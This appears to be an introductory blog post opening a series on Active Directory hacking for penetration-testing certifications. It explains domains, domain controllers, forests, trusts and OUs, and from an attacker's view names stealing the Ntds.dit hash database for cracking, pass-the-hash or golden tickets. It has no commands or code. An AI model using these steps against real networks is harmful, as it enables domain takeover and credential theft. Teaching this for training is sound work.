Many organizations today use Active Directory for better management, policy implementations, and many more. The attacks on these kinds of environments are increasing and attackers are coming up with new methods of compromising. Also, many certifications (including OSCP, and PNPT) now require taking over the Active Directory to pass the exam. So, in this series of articles, we will discuss Active Directory hacking. We will cover some basics and then explain the attacks in the simulated environment.
These blogs will be focused on understanding the Windows Active Directory and seeing it from the attacker’s perspective. Normally, an administrator implements security policies but due to some misconfiguration, the attackers are able to take advantage of them.
A Microsoft service that acts as a centralized repository and stores all data related to objects and makes management easier. Eventually, these objects may include AD users, computers, servers, and other resources. Although it has many functions, the primary function is to provide a way to authenticate users and machines in a domain environment. The management of resources and objects in an AD is done remotely hence providing a single management interface that is accessible from anywhere in the network.
Even though it is a feature of Windows, but you can join other operating systems in an AD environment.
Why Active Directory?
It is the most commonly used Identity Management service in the world. In fact, 95% of Fortune 1000 companies implement it in their network. Also, As per the attacker’s view, we can exploit the AD without any exploit available which means we do not always need a patchable exploit. Instead, we abuse the features, trusts, components, and more.
Active Directory Domain
A domain is a collection or structure of all Active Directory objects including users, computers, groups, etc. sharing a common AD database. A domain is always referred to by its unique name and has a proper domain name structure.
We can split up an AD infrastructure into separate domains to create smaller boundaries so as to segregate the administration tasks for different domains. Eventually, each domain can have its own policies and are applied to only the users of that specific domain.
Following are some important components of a domain
- Authentication Service
- Group Policies
Physical AD Components
We will talk about two very important physical AD components.
A DC is the main server of the domain that manages all actions and has multiple features that it provides and does for the environment.
- Hosting a copy of the AD DS (Domain Service) directory store having all information about the objects
- Providing Authentication and Authorization services using Kerberos
- Replicates updates to other domain controllers in the domain and forest (where we have parent-child relation)
- Allows administrative access to manage user accounts and network resources
In a red team engagement, one of the aims is to gain control of the DC because it has ultimate powers over the domain leading to the whole network compromise.
The AD DS data store contains the database files and processes that store and manage directory information for users, services, and applications.
Also, as an attacker, after getting access to DC, the target is to get
Ntds.dit file from the data store. And its default location is
%SystemRoot%\NTDS folder on all domain controllers. This file is really sensitive as it contains everything stored in AD data
- Password hashes for all users
We can then use these hashes to either crack, use in pass the hash, or golden ticket, etc.
Logical AD Components
A schema is a blueprint containing the definitions of every object that can be created in AD. Therefore, it has a Class Object defining what object can be created, and an Attribute Object defining what information can an object hold. Mainly, it enforces the rules.
The domain is used to group and manage objects in an organization. When we have a single domain in an organization, it acts like a DC (Domain Controller).
- An administrative boundary for applying policies to groups of objects
- A replication boundary for replicating data between domain controllers
- An authentication and authorization boundary that provides a way to limit the scope of access to resources
It is a group of domains in a hierarchy and when we have the subdomains of a parent domain, we see a hierarchy in the form of a tree.
All domains in a tree:
- Share a contiguous namespace with the parent domain
- Can have additional child domains
- By default create a two-way transitive trust with other domains
A forest is a collection of trees linked in some way.
The following are the characteristics of the forests:
- Share a common schema
- Share a common global catalog to enable searching
- Enable trust between all domains in the forest
- Share a common configuration partition
- Share the Enterprise Admins and Schema Admins groups
OUs are AD containers that contain users, groups, computers, and other OUs.
The following are the uses of OUs:
- Represent your organization hierarchically and logically
- Manage a collection of objects in a consistent way
- Delegate permissions to administer groups of objects
- Apply policies
Trusts provide a mechanism for users to gain the access to resources in another domain. Then we have two types of trusts, directional and transitive.
Firstly, in directional trust, the domain trusts the other domain. But in transitive trust, the domain trusts everything that the other trusted domain trusts.
Objects are inside an OU. An object can be a user, group, computer, shared folder, etc.
Summarizing the logical component
Domains group and manage the objects in an organization. Then, if we have multiple domains, then we have a tree (containing a parent and one or more child domains that may extend). And when we have multiple trees, they build a forest. Finally, across these trees and forests, we have trust (directive or transitive) that defines access to resources.
Inside the domains are the OUs (Organizational Units) and these OUs contain the objects.
Now we have an understanding of AD and its components. Next, we will be focusing on building a lab environment where we can implement the domains and then eventually attack them.